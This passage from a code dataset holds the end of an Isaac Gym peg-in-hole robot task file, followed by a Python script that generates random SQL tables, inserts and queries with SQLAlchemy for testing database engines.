self.hole_actor_id_env] = 0.0\n self.root_angvel[env_ids, self.hole_actor_id_env] = 0.0\n\n peg_hole_actor_ids_sim = torch.cat((self.peg_actor_ids_sim[env_ids],\n self.hole_actor_ids_sim[env_ids]),\n dim=0)\n self.gym.set_actor_root_state_tensor_indexed(self.sim,\n gymtorch.unwrap_tensor(self.root_state),\n gymtorch.unwrap_tensor(peg_hole_actor_ids_sim),\n len(peg_hole_actor_ids_sim))\n\n def _reset_buffers(self, env_ids):\n \"\"\"Reset buffers.\"\"\"\n\n self.reset_buf[env_ids] = 0\n self.progress_buf[env_ids] = 0\n\n def _set_viewer_params(self):\n \"\"\"Set viewer parameters.\"\"\"\n\n cam_pos = gymapi.Vec3(-1.0, -1.0, 1.0)\n cam_target = gymapi.Vec3(0.0, 0.0, 0.5)\n self.gym.viewer_camera_look_at(self.viewer, None, cam_pos, cam_target)\n\n def _apply_actions_as_ctrl_targets(self, actions, ctrl_target_gripper_dof_pos, do_scale):\n \"\"\"Apply actions from policy as position/rotation targets.\"\"\"\n\n # Interpret actions as target pos displacements and set pos target\n pos_actions = actions[:, 0:3]\n if do_scale:\n pos_actions = pos_actions @ torch.diag(torch.tensor(self.cfg_task.rl.pos_action_scale, device=self.device))\n self.ctrl_target_fingertip_midpoint_pos = self.fingertip_midpoint_pos + pos_actions\n\n # Interpret actions as target rot (axis-angle) displacements\n rot_actions = actions[:, 3:6]\n if do_scale:\n rot_actions = rot_actions @ torch.diag(torch.tensor(self.cfg_task.rl.rot_action_scale, device=self.device))\n\n # Convert to quat and set rot target\n angle = torch.norm(rot_actions, p=2, dim=-1)\n axis = rot_actions / angle.unsqueeze(-1)\n rot_actions_quat = torch_utils.quat_from_angle_axis(angle, axis)\n if self.cfg_task.rl.clamp_rot:\n rot_actions_quat = torch.where(angle.unsqueeze(-1).repeat(1, 4) > self.cfg_task.rl.clamp_rot_thresh,\n rot_actions_quat,\n torch.tensor([0.0, 0.0, 0.0, 1.0], device=self.device).repeat(self.num_envs,\n 1))\n self.ctrl_target_fingertip_midpoint_quat = torch_utils.quat_mul(rot_actions_quat, self.fingertip_midpoint_quat)\n\n if self.cfg_ctrl['do_force_ctrl']:\n # Interpret actions as target forces and target torques\n force_actions = actions[:, 6:9]\n if do_scale:\n force_actions = force_actions @ torch.diag(\n torch.tensor(self.cfg_task.rl.force_action_scale, device=self.device))\n\n torque_actions = actions[:, 9:12]\n if do_scale:\n torque_actions = torque_actions @ torch.diag(\n torch.tensor(self.cfg_task.rl.torque_action_scale, device=self.device))\n\n self.ctrl_target_fingertip_contact_wrench = torch.cat((force_actions, torque_actions), dim=-1)\n\n self.ctrl_target_gripper_dof_pos = ctrl_target_gripper_dof_pos\n\n self.generate_ctrl_signals()\n\n def _get_keypoint_offsets(self, num_keypoints):\n \"\"\"\n Get uniformly-spaced keypoints along a line of unit length, centered at 0.\n e.g. 
if num_keypoints = 2 :\n tensor([[ 0.0000, 0.0000, -0.5000],\n [ 0.0000, 0.0000, 0.5000]])\n\n if num_keypoints = 4 :\n tensor([[ 0.0000, 0.0000, -0.5000],\n [ 0.0000, 0.0000, -0.1667],\n [ 0.0000, 0.0000, 0.1667],\n [ 0.0000, 0.0000, 0.5000]])\n \"\"\"\n\n keypoint_offsets = torch.zeros((num_keypoints, 3), device=self.device)\n keypoint_offsets[:, -1] = torch.linspace(0.0, 1.0, num_keypoints, device=self.device) - 0.5\n\n return keypoint_offsets\n\n def _get_keypoint_dist(self):\n \"\"\"Get keypoint distance.\"\"\"\n\n keypoint_dist = torch.sum(torch.norm(self.keypoints_hole - self.keypoints_peg, p=2, dim=-1), dim=-1)\n # print(f'peg{self.keypoints_peg}dist{keypoint_dist}')\n return keypoint_dist\n\n def _check_peg_close_to_hole(self):\n \"\"\"Check if peg is close to hole.\"\"\"\n\n keypoint_dist = torch.norm(self.keypoints_hole - self.keypoints_peg, p=2, dim=-1)\n\n is_peg_close_to_hole = torch.where(torch.sum(keypoint_dist, dim=-1) < self.cfg_task.rl.close_error_thresh,\n torch.ones_like(self.progress_buf),\n torch.zeros_like(self.progress_buf))\n # Peg Hole tensors self.cfg_task.rl.peg_over_hole\n is_peg_over_hole = torch.where(self.peg_pos[ : , 2] > self.cfg_task.rl.peg_over_hole + self.cfg_base.env.table_height,\n torch.ones_like(self.progress_buf),\n torch.zeros_like(self.progress_buf))\n\n is_peg_close_to_hole=torch.where(torch.logical_and(is_peg_close_to_hole, is_peg_over_hole),\n torch.ones_like(self.progress_buf),\n torch.zeros_like(self.progress_buf)) \n return is_peg_close_to_hole\n\n def _randomize_gripper_pose(self, env_ids, sim_steps):\n \"\"\"Move gripper to random pose.\"\"\"\n\n # Set target pos above table\n self.ctrl_target_fingertip_midpoint_pos = torch.tensor([0.0, 0.0, self.cfg_base.env.table_height], device=self.device)+\\\n torch.tensor(self.cfg_task.randomize.fingertip_midpoint_pos_initial, device=self.device)\n self.ctrl_target_fingertip_midpoint_pos = self.ctrl_target_fingertip_midpoint_pos.unsqueeze(0).repeat(self.num_envs, 1)\n\n fingertip_midpoint_pos_noise = \\\n 2 * (torch.rand((self.num_envs, 3), dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n fingertip_midpoint_pos_noise = \\\n fingertip_midpoint_pos_noise @ torch.diag(torch.tensor(self.cfg_task.randomize.fingertip_midpoint_pos_noise,\n device=self.device))\n self.ctrl_target_fingertip_midpoint_pos += fingertip_midpoint_pos_noise\n\n # Set target rot\n ctrl_target_fingertip_midpoint_euler = torch.tensor(self.cfg_task.randomize.fingertip_midpoint_rot_initial,\n device=self.device).unsqueeze(0).repeat(self.num_envs, 1)\n\n fingertip_midpoint_rot_noise = \\\n 2 * (torch.rand((self.num_envs, 3), dtype=torch.float32, device=self.device) - 0.5) # [-1, 1]\n fingertip_midpoint_rot_noise = fingertip_midpoint_rot_noise @ torch.diag(\n torch.tensor(self.cfg_task.randomize.fingertip_midpoint_rot_noise, device=self.device))\n ctrl_target_fingertip_midpoint_euler += fingertip_midpoint_rot_noise\n self.ctrl_target_fingertip_midpoint_quat = torch_utils.quat_from_euler_xyz(\n ctrl_target_fingertip_midpoint_euler[:, 0],\n ctrl_target_fingertip_midpoint_euler[:, 1],\n ctrl_target_fingertip_midpoint_euler[:, 2])\n\n # Step sim and render\n for _ in range(sim_steps):\n self.refresh_base_tensors()\n self.refresh_env_tensors()\n self._refresh_task_tensors()\n\n pos_error, axis_angle_error = fc.get_pose_error(\n fingertip_midpoint_pos=self.fingertip_midpoint_pos,\n fingertip_midpoint_quat=self.fingertip_midpoint_quat,\n ctrl_target_fingertip_midpoint_pos=self.ctrl_target_fingertip_midpoint_pos,\n 
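# NOTE (hedged sketch): `_get_keypoint_offsets` places num_keypoints points
# evenly along z on a unit segment centered at 0, and `_get_keypoint_dist` sums
# the per-keypoint L2 distances between peg and hole keypoints. A standalone
# equivalent in plain PyTorch; the helper name is invented for illustration.
import torch

def keypoint_offsets(n: int) -> torch.Tensor:
    out = torch.zeros((n, 3))
    out[:, -1] = torch.linspace(0.0, 1.0, n) - 0.5
    return out

peg = keypoint_offsets(4)
hole = keypoint_offsets(4) + torch.tensor([0.0, 0.0, 0.1])
dist = torch.sum(torch.norm(hole - peg, p=2, dim=-1), dim=-1)  # == 4 * 0.1 = 0.4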
ctrl_target_fingertip_midpoint_quat=self.ctrl_target_fingertip_midpoint_quat,\n jacobian_type=self.cfg_ctrl['jacobian_type'],\n rot_error_type='axis_angle')\n\n delta_hand_pose = torch.cat((pos_error, axis_angle_error), dim=-1)\n actions = torch.zeros((self.num_envs, self.cfg_task.env.numActions), device=self.device)\n actions[:, :6] = delta_hand_pose\n\n self._apply_actions_as_ctrl_targets(actions=actions,\n ctrl_target_gripper_dof_pos=0.0,\n do_scale=False)\n\n self.gym.simulate(self.sim)\n self.render()\n\n self.dof_vel[env_ids, :] = torch.zeros_like(self.dof_vel[env_ids])\n\n # Set DOF state\n multi_env_ids_int32 = self.franka_actor_ids_sim[env_ids].flatten()\n self.gym.set_dof_state_tensor_indexed(self.sim,\n gymtorch.unwrap_tensor(self.dof_state),\n gymtorch.unwrap_tensor(multi_env_ids_int32),\n len(multi_env_ids_int32))\n","repo_name":"wangjunyi9999/assembly_tasks","sub_path":"Peg-in-Hole/peg_in_hole/tasks/factory_task_peg_hole_place.py","file_name":"factory_task_peg_hole_place.py","file_ext":"py","file_size_in_byte":21295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70696360082","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport signal\nimport random\nimport shutil\nimport argparse\nimport subprocess\nimport json\nfrom statistics import mean\nimport traceback\nimport sys\nimport conf\nfrom loader import *\nfrom model import *\nfrom mutator_conf import *\nfrom common import *\nfrom PrincipledMutation import *\n\nfrom sqlalchemy import create_engine, Table, Column, \\\n String, DateTime, MetaData, ForeignKey\nfrom sqlalchemy import select, join, alias, true, false\nfrom sqlalchemy.schema import CreateTable\nfrom sqlalchemy.engine.default import DefaultDialect\nfrom sqlalchemy.sql.sqltypes import *\nfrom sqlalchemy.dialects import postgresql # mysql, sqlite,\nfrom sqlalchemy.orm import load_only\nfrom sqlalchemy import or_\nfrom sqlalchemy import not_\nfrom sqlalchemy import inspect\n\n\"\"\"\n./mutator.py -s select\n./mutator.py -s sequence\nHOW TO RUN IT WITH EXISTING DATABASES:\n./mutator.py --db_info=db_conf.json --output=demo.sql -s seq\n\"\"\"\n\n# TODO:\n\"\"\"\n1. array\n - mytable = Table(\"mytable\", metadata, Column(\"data\", ARRAY(Integer)))\n2. enum\n - import enum\n - class MyEnum(enum.Enum):\n one = 1 two = 2 three = 3\n - t = Table('data', MetaData(), Column('value', Enum(MyEnum)))\n3. Sequence\n\"\"\"\n\n# reference: https://www.manuelrigger.at/pqs/\n\n\ndef exit_gracefully(original_sigint):\n def _exit_gracefully(signum, frame):\n signal.signal(signal.SIGINT, original_sigint)\n try:\n if input(\"\\nReally quit? 
(y/n)> \").lower().startswith('y'):\n sys.exit(1)\n except KeyboardInterrupt:\n print(\"Ok ok, quitting\")\n sys.exit(1)\n signal.signal(signal.SIGINT, _exit_gracefully)\n\n return _exit_gracefully\n\n\ndef mkdirs(pn):\n try:\n os.makedirs(pn)\n except OSError:\n pass\n\n\ndef rmdirs(pn):\n try:\n shutil.rmtree(pn)\n except OSError:\n pass\n\n\ndef run_query_pg(query):\n\n with open(TMP_QUERY, 'w') as f:\n f.write(query)\n\n cmd = \"timeout 5s psql -t -F ',' --no-align -f %s\" % TMP_QUERY\n print(subprocess.getoutput(cmd))\n\n\ndef run_query_my(query):\n\n with open(TMP_QUERY, 'w') as f:\n f.write(query)\n\n cmd = \"timeout 5s mysql -N --skip-column-names -u mysql -pmysql < %s\" \\\n % TMP_QUERY\n subprocess.getoutput(cmd)\n\n\ndef run_set_operation(query1, query2):\n chosen_operation = random.choice(SET_OPERATION)\n if chosen_operation == \"intersect\":\n print(\"try intersect\")\n return query1.intersect(query2)\n elif chosen_operation == \"intersect_all\":\n print(\"try intersect all\")\n return query1.intersect_all(query2)\n elif chosen_operation == \"union\":\n print(\"try union\")\n return query1.union(query2)\n elif chosen_operation == \"union_all\":\n print(\"try union all\")\n return query1.union_all(query2)\n elif chosen_operation == \"except_\":\n print(\"try except_\")\n return query1.except_(query2)\n elif chosen_operation == \"except_all\":\n print(\"try except_all\")\n return query1.except_all(query2)\n else:\n raise ValueError('a strange operation without sqlalchemy operation')\n\n\n# This class is for each table\n\n\nclass TableSpec(object):\n def __init__(self, name):\n self.table_name = name\n self.columns = []\n self.row_data = []\n self.pk_idx = None\n self.fk_idx = -1\n self.num_tuples = -1\n\n def add_column(self, column_name, column_type):\n self.columns.append((column_name, column_type))\n\n\n# This statistics class is built for each table\nclass TableStat(object):\n # maintain statistics for each table\n\n def __init__(self, tablename):\n self.tablename = tablename\n self.columns = []\n self.column_name = []\n self.column_type = []\n\n # min, max, average\n self.columns_stat = []\n self.table_size = 0\n\n # sqlalchemy table\n # self.sqlalchemy_tbl = None\n\n \"\"\"\n def add_sqlalchemy_tbl(self, tbl):\n self.sqlalchemy_tbl = tbl\n \"\"\"\n\n def add_column(self, column_name, column_type):\n self.column_name.append(column_name)\n self.column_type.append(column_type)\n self.columns.append([])\n\n # get row-wise data and transform to column-wise data\n def add_data(self, data):\n for x in range(len(data)):\n self.columns[x].append(data[x])\n self.table_size += 1\n\n # ret stat data by columnname\n def ret_stat(self, columnname):\n for x in range(len(self.column_name)):\n if self.column_name[x] == columnname:\n return self.columns_stat[x]\n else:\n AssertionError(\"No matching column name, my mistake\")\n\n # ret string data by columnname\n def ret_string(self, columnname):\n for x in range(len(self.column_name)):\n if self.column_name[x] == columnname:\n return self.columns[x]\n else:\n AssertionError(\"No matching column name, my mistake\")\n\n @staticmethod\n def ret_table_with_tblname(sqlalchemy_tbllist, tblname):\n for idx in range(len(sqlalchemy_tbllist)):\n name = sqlalchemy_tbllist[idx].name\n # print(name)\n if tblname == name:\n return sqlalchemy_tbllist[idx]\n return None\n\n @staticmethod\n def ret_tablestat_with_tblname(tbl_stat_list, tblname):\n for idx in range(len(tbl_stat_list)):\n name = tbl_stat_list[idx].tablename\n if tblname == name:\n return 
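# NOTE (hedged sketch): `run_set_operation` above dispatches on a random choice
# of SQLAlchemy set combinators via the methods on a Select. The same effect,
# written compactly with the module-level combinator functions; this is a
# sketch, not this repo's API.
import random
from sqlalchemy import union, union_all, intersect, intersect_all, except_, except_all

def combine(q1, q2):
    op = random.choice([union, union_all, intersect, intersect_all, except_, except_all])
    return op(q1, q2)   # returns a compound select combining both queries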
tbl_stat_list[idx]\n return None\n\n # when insertion is done, we calculate the stat\n\n def calculate_stat(self):\n\n # debug\n # print(self.columns)\n\n for x in range(len(self.columns)):\n\n # 1) if string/text ==> store length\n if self.column_type[x] == \"String\":\n temp_arr = []\n for y in range(len(self.columns[x])):\n temp_arr.append(len(self.columns[x][y]))\n\n _min, _max, _avg = self.stat_from_arr(temp_arr)\n\n # 2) if DateTime\n elif self.column_type[x] == \"DateTime\":\n temp_arr = []\n for y in range(len(self.columns[x])):\n # print(\"sampled datatime\", y)\n temp_arr.append(int(self.columns[x][y].strftime(\"%Y%m%d %H:%M:%S\")))\n # temp_arr.append(int(self.columns[x][y]))\n\n\n _min, _max, _avg = self.stat_from_arr(temp_arr)\n\n # 3) if numetic\n else:\n _min, _max, _avg = self.stat_from_arr(self.columns[x])\n\n self.columns_stat.append([_min, _max, _avg])\n\n def calculate_stat_existing_db(self, column_data, x):\n # call once for each column, different from previous method calculate_stat and populate data\n # debug\n # 1) if string/text\n if self.column_type[x] == \"String\" or isinstance((column_data[0]), str):\n temp_arr = []\n for y in range(len(column_data)):\n if column_data[y]:\n temp_arr.append(len(column_data[y]))\n else:\n temp_arr.append(0)\n _min, _max, _avg = self.stat_from_arr(temp_arr)\n self.columns_stat.append([_min, _max, _avg])\n self.columns[x].extend(column_data)\n # 2) if DateTime\n elif isinstance((column_data[0]), datetime.date):\n temp_arr = []\n for y in range(len(column_data)):\n temp_arr.append(int(column_data[y].strftime(\"%Y%m%d\")))\n # print(\"sampled datatime\", column_data[y])\n # temp_arr.append(int(column_data[y]))\n _min, _max, _avg = self.stat_from_arr(temp_arr)\n self.columns_stat.append([_min, _max, _avg])\n self.columns[x].extend(column_data)\n # 3) if numeric\n elif isinstance(column_data[0], (float, int)):\n _min, _max, _avg = self.stat_from_arr(column_data)\n self.columns_stat.append([_min, _max, _avg])\n self.columns[x].extend(column_data)\n\n # print(\"finish run update for this column\")\n\n def stat_from_arr(self, array):\n _min = min(array)\n _max = max(array)\n _avg = mean(array)\n return _min, _max, _avg\n\ndef load_existing_dbschema(config_data):\n # return 4 datafield in createsequences class\n table_specs = [] # tables spec (Tableclass), name,\n table_stats = [] # tables_stat # tables statistics (TableStat class)\n sqlalchemy_tables = []\n \n # TODO: Update connstring to not use hardcoded values\n db_name = config_data[\"name\"]\n conn_str = \"postgresql://postgres:postgres@localhost:5438/{}\".format(db_name)\n \n postgres_engine = create_engine(conn_str)\n schemameta = MetaData(postgres_engine)\n DBSession = sessionmaker(bind=postgres_engine)\n session = DBSession()\n \n table_names = (config_data[\"tables\"])\n for table_name in table_names:\n sqlalchemy_table = Table(table_name,\n schemameta,\n autoload=True,\n autoload_with=postgres_engine)\n sqlalchemy_tables.append(sqlalchemy_table)\n \n table_stat = TableStat(table_name)\n table_spec = TableSpec(table_name)\n \n table_spec.pk_idx = -1\n table_spec.fk_idx = -1\n results = session.query(sqlalchemy_table)\n table_stat.table_size = len(results.all())\n sample_results = (results[:5])\n \n for c in sqlalchemy_table.columns:\n column_data = [i[c] for i in sample_results]\n # need to use sqlalchemy type instead of real database's type\n table_spec.add_column(c.name, (c.type))\n typename = ret_typename_from_class(c.type)\n table_stat.add_column(c.name, typename)\n\n 
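# NOTE: two likely bugs in TableStat above. First, ret_stat/ret_string construct
# AssertionError(...) without raising it, so an unknown column name silently
# returns None. Second, the DateTime branch of calculate_stat calls
# int(v.strftime("%Y%m%d %H:%M:%S")), which raises ValueError because the
# formatted string contains a space and colons; the existing-DB variant's
# "%Y%m%d" format is the one that actually parses. A hedged sketch of the
# intended per-type reduction (helper name invented):
from datetime import datetime
from statistics import mean

def column_stat(values):
    if isinstance(values[0], str):
        values = [len(v) for v in values]                            # strings -> lengths
    elif isinstance(values[0], datetime):
        values = [int(v.strftime("%Y%m%d%H%M%S")) for v in values]   # digits only
    return min(values), max(values), mean(values)

print(column_stat(["ab", "abcd"]))  # (2, 4, 3)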
table_specs.append(table_spec)\n table_stats.append(table_stat)\n \n for c in range(len(sqlalchemy_table.columns)):\n column_data = [i[c] for i in sample_results]\n table_stat.calculate_stat_existing_db(\n column_data, c)\n\n # the tpch does not have any pk or fk\n return table_specs, table_stats, sqlalchemy_tables, sqlalchemy_tables\n\n# TODO: apply Table class when generate spec\n\n\nclass CreateSequences(object):\n \"\"\" Create queries for Create Table, Update, Insert, and Select \"\"\"\n def __init__(self,\n max_table=1,\n max_column=3,\n max_tuple=5,\n db_name=\"sqlalchemy\"):\n # initial data\n self.metadata = MetaData()\n self.max_column = max_column # max number of columns per table\n self.max_table = max_table\n self.max_tuple = max_tuple\n\n # output also required for existing database\n self.tables = [] # tables spec (TableSpec class)\n self.tables_stat = [] # tables statistics (TableStat class)\n self.sqlalchemy_tables = [] # sqlalchemy tables\n self.alc_tables = [] # sqlalchemy tables\n # output required for starting from scratch\n self.create_insert = '' # store \"create table\", \"insert\", \"index\"\n self.update = ''\n self.delete = ''\n\n # directory\n self.TMP_DIR = \"%s\" % (FUZZ_MAIN)\n self.TMP_QUERY_PN = os.path.join(FUZZ_MAIN, \"sqlsmith_query\")\n self.TMP_ERR_PN = os.path.join(FUZZ_MAIN, \"sqlsmith_err\")\n\n # sqlite engine\n # self.sqlite_engine = create_engine('sqlite:///:memory:', echo=False)\n rmdirs(FUZZ_MAIN)\n try:\n os.remove(\"%s\" % (DB_FILE))\n except Exception:\n pass\n mkdirs(FUZZ_MAIN)\n\n self.sqlite_engine = create_engine('sqlite:///%s' % (DB_FILE),\n echo=False)\n self.mysql_engine = create_engine(\n 'mysql://mysql:mysql@localhost/sqlalchemy')\n self.postgres_engine = create_engine('postgresql:///' + db_name)\n\n def update_from_existing_db(self, tables, tables_stat, sqlalchemy_tables,\n alc_tables):\n self.tables = tables\n self.tables_stat = tables_stat\n self.sqlalchemy_tables = sqlalchemy_tables\n self.alc_tables = alc_tables\n print(\"Finish loading schema info for \", len(self.sqlalchemy_tables),\n \" tables\")\n\n def create_tables(self):\n \"\"\"\n 1) need to decide the number of columns for each table\n 2) for each table, decide which column is primary key\n 3) - for each table (not all), decide which column is foreign key\n - also decide which column (w/ primary key) is referenced\n \"\"\"\n \"\"\"\n TODO:\n 1) CREATE TABLE t0(c0 INT UNIQUE COLLATE NOCASE);\n 2) Add two or more primary keys\n 3) support \"Nullable\" option:\n - e.g Column('user_id', Integer, ForeignKey(\"user.id\"),\n nullable=False)\n - we also should support use null data\n \"\"\"\n\n # Spec: num_column, types, PK, FK(optional)\n # - as a start, second to last tables always have FK\n table_spec = []\n tables = []\n\n for x in range(self.max_table):\n # 1) num_columns\n # 2) decide PK\n num_column = randoms.random_int_range(\n self.max_column) + 1 # at least two\n pk_column = randoms.random_int_range(num_column) - 1 # index\n fk_column = -1\n\n # 3) FK\n # if this is second or later table (e.g., 3rd table)\n if x > 0:\n fk_column = self.ret_fk(num_column, pk_column)\n table_spec.append((num_column, pk_column, fk_column))\n\n # 4) generate table creation queries\n prev_columns = None\n prev_table_name = ''\n for x in range(self.max_table):\n table_name = \"TABLE%d\" % x\n\n # generate new table\n temp_table = Table(table_name, self.metadata)\n columns = self.ret_columns(table_spec, x)\n\n # generate table-stat\n table_stat = TableStat(table_name)\n\n # create class for 
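# NOTE: `load_existing_dbschema` above uses `sessionmaker`, which is not among
# the explicit imports shown; unless one of the star imports provides it, the
# file needs `from sqlalchemy.orm import sessionmaker`. The reflection core,
# reduced to a hedged sketch (placeholder connection string; autoload=True /
# autoload_with is SQLAlchemy 1.x style, matching the repo's usage):
from sqlalchemy import create_engine, MetaData, Table

engine = create_engine("postgresql://user:pass@localhost:5432/dbname")
meta = MetaData()
t = Table("some_table", meta, autoload=True, autoload_with=engine)
print([(c.name, type(c.type).__name__) for c in t.columns])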
spec\n table_class = TableSpec(table_name)\n table_class.pk_idx = table_spec[x][1]\n table_class.fk_idx = table_spec[x][2]\n\n for y in range(len(columns)):\n column_name, column_type = columns[y]\n # print (column_name, column_type)\n\n # if not PK: then check FK and no-key\n if table_spec[x][1] != y:\n # TODO: add nullable option\n # e.g., Column('email_address', String (30),\n # nullable=False)\n\n # if FK\n if table_spec[x][2] == y:\n # FK_name = prev_PK_name\n FK_name = prev_columns[table_spec[x - 1][1]][0]\n prev_table_pk_idx = self.tables[-1].pk_idx\n\n # get type\n column_type = self.tables[-1].\\\n columns[prev_table_pk_idx][1]\n cur_column = Column(\n column_name, column_type,\n ForeignKey(prev_table_name + \".\" + FK_name))\n # if not FK\n else:\n cur_column = Column(column_name, column_type)\n\n # if PK: then add primary condition to column\n else:\n # prev_PK_name = column_name\n cur_column = Column(column_name,\n column_type,\n primary_key=True)\n\n # add column to table and table-stat\n temp_table.append_column(cur_column)\n table_class.add_column(column_name, column_type)\n typename = self.ret_typename_from_class(column_type)\n table_stat.add_column(column_name, typename)\n\n # store table data\n prev_columns = columns\n prev_table_name = table_name\n tables.append(temp_table)\n # table_stat.add_sqlalchemy_tbl(temp_table)\n\n # 4-1) store created table's spec\n self.tables.append(table_class)\n self.tables_stat.append(table_stat)\n\n # 5) dump table into SQL\n for table in tables:\n table.create(self.sqlite_engine, checkfirst=True)\n ct_data = CreateTable(table).compile(self.sqlite_engine,\n dialect=postgresql.dialect())\n print(ct_data)\n # print out created table to the console\n\n self.create_insert += str(ct_data).strip() + \";\\n\\n\"\n self.alc_tables.append(table)\n\n self.sqlalchemy_tables = tables\n\n def choose_join_tables(self):\n \"\"\"\n finds proper tables and column for making join\n\n input: none\n return: tbl1, tbl2, tbl1_col, tbl2_col\n \"\"\"\n\n tbl_index = randoms.random_int_range(len(self.tables) - 1)\n tbl1 = self.alc_tables[tbl_index - 1]\n tbl2 = self.alc_tables[tbl_index]\n\n tbl1_referenced_idx = self.tables[tbl_index - 1].pk_idx\n tbl2_foreignkey_idx = self.tables[tbl_index].fk_idx\n cname1 = self.tables_stat[tbl_index - 1].\\\n column_name[tbl1_referenced_idx]\n cname2 = self.tables_stat[tbl_index].column_name[tbl2_foreignkey_idx]\n\n # print (tbl_index-1)\n # print(cname1)\n # print(cname2)\n col1 = getattr(self.alc_tables[tbl_index - 1].c, cname1)\n col2 = getattr(self.alc_tables[tbl_index].c, cname2)\n\n return tbl1, tbl2, col1, col2, tbl_index - 1\n\n def ret_types_from_table(self, tbl):\n tbl_idx = self.alc_tables.index(tbl)\n tbl_types = self.tables_stat[tbl_idx].column_type\n return tbl_types\n\n def choose_same_type_columns(self, tbl1, tbl2):\n \"\"\"\n given sqlalchemy_table, we will return two columns with same type\n\n input:\n return: tbl1_sametype_col, tbl2_sametype_col, typename\n \"\"\"\n # 1) enumerate types for each table\n tbl1_types = self.ret_types_from_table(tbl1)\n tbl2_types = self.ret_types_from_table(tbl2)\n\n # 2) find common types\n common = (set(tbl1_types).intersection(tbl2_types))\n\n if len(common) < 1:\n return None, None, None, None\n\n # 3) randomly choose table\n chosen_type = random.choice(list(common))\n col1 = self.choose_columns_sqlalchemy_type(tbl1, chosen_type)\n col2 = self.choose_columns_sqlalchemy_type(tbl2, chosen_type)\n # print(\"!\")\n\n return col1, col2, chosen_type\n\n def insert_tuples(self):\n 
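# NOTE (hedged sketch): `create_tables` chains tables so that table N holds a
# foreign key to table N-1's primary key, then renders the DDL for a chosen
# dialect. The pattern it builds, reduced to two fixed tables with invented
# column names:
from sqlalchemy import MetaData, Table, Column, Integer, String, ForeignKey
from sqlalchemy.schema import CreateTable
from sqlalchemy.dialects import postgresql

meta = MetaData()
table0 = Table("TABLE0", meta,
               Column("k0", Integer, primary_key=True),
               Column("v0", String))
table1 = Table("TABLE1", meta,
               Column("k1", Integer, primary_key=True),
               Column("f1", Integer, ForeignKey("TABLE0.k0")))  # FK -> previous PK
# As in create_tables, the DDL can be compiled for a specific dialect:
print(CreateTable(table1).compile(dialect=postgresql.dialect()))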
\"\"\" Insert data from first to last table\n 1) read tables spec:\n - table_name, column_name, column_type, constraints\n 2) generate input\n \"\"\"\n \"\"\" test\n print (self.tables[0])\n print (self.tables[0].columns)\n print (self.tables[0].pk_idx)\n print (self.tables[0].fk_idx)\n \"\"\"\n\n # table iterator\n for x in range(len(self.tables)):\n # tuple iterator\n current_alc_table = self.alc_tables[x]\n\n prev_primary_idx = 0\n\n # tuple insert\n num_of_tuples = randoms.random_int_range(self.max_tuple)\n for y in range(num_of_tuples):\n # colume iterator\n row_data = []\n insert_dict = {}\n\n # TODO: consider primary key (do not allow unique values)\n for z in range(len(self.tables[x].columns)):\n\n # read type name (VARCHAR special case, it is not a class)\n if type(self.tables[x].columns[z][1]) == String:\n typename = \"String\"\n else:\n typename = self.tables[x].columns[z][1].__name__\n gendata = self.get_rand_data(typename)\n\n # generate data\n if x < 1 or z != self.tables[x].fk_idx:\n row_data.append(gendata)\n elif randoms.prob(conf.PROB_TABLE[\"PROB_SHARED_DATA\"]) \\\n and len(self.tables[x - 1].row_data) >\\\n prev_primary_idx - 2:\n row_data.append(gendata)\n\n else:\n if y - 1 < self.tables[x - 1].num_tuples and \\\n prev_primary_idx < self.tables[x - 1].\\\n num_tuples:\n prev_pk_idx = self.tables[x - 1].pk_idx\n row_data.append(self.tables[\n x - 1].row_data[prev_primary_idx][prev_pk_idx])\n prev_primary_idx = prev_primary_idx + 1\n\n else:\n row_data.append(gendata)\n\n for z in range(len(row_data)):\n column_name = self.tables[x].columns[z][0]\n # {column_name:row_data}\n insert_dict[column_name] = row_data[z]\n\n # update data to tables (sqlalchemy) and table statistics\n self.tables[x].row_data.append(row_data)\n self.tables_stat[x].add_data(row_data)\n\n # insert rowdata to statistics, then it will convert\n # column-wise\n\n # SQLalchemy query to string\n query = current_alc_table.insert().values(insert_dict)\n conn_sqlite = self.sqlite_engine.connect()\n # conn_postgres = self.postgres_engine.connect()\n # conn_mysql = self.mysql_engine.connect()\n\n conn_sqlite.execute(query)\n query.bind = self.sqlite_engine\n\n self.create_insert += literalquery(query) + \";\\n\\n\"\n # self.create_insert += str(in_data).strip() + \";\\n\\n\"\n\n self.tables[x].num_tuples = num_of_tuples\n\n # update stat explicitly\n self.tables_stat[x].calculate_stat()\n\n def ret_fk(self, num_column, pk_column):\n\n count = 0\n while True:\n count += 1\n assert count < 100\n\n temp_idx = randoms.random_int_range(num_column) - 1\n if temp_idx != pk_column:\n return temp_idx\n\n def ret_rand_type(self):\n \"\"\" return type for column generation\"\"\"\n return COLUMN_TYPES[randoms.random_int_range(NUM_COLUMN_TYPES) - 1]\n\n def ret_columns(self, table_spec, cur_idx):\n \"\"\" return columns (name, type, option)\n - name\n - type: int, string, ...\n - option: foreign / primary key\n \"\"\"\n\n num_column, _, fk_column = table_spec[cur_idx]\n # print (num_column, pk_column, fk_column)\n\n column_spec = [] # return data: [('name', 'type, 'option'), ...]\n\n for x in range(num_column):\n column_name = \"%s\" % (randoms.random_strings(6))\n if x != fk_column:\n column_type = self.ret_rand_type()\n else:\n # foreign key column\n column_type = None\n\n column_spec.append((column_name, column_type))\n\n return column_spec\n\n def run_sqlite_query(self, query):\n with open(self.TMP_QUERY_PN, 'w') as f:\n f.write(query)\n\n cmd = \"sqlite3 %s < %s\" % (DB_FILE, self.TMP_QUERY_PN)\n output = 
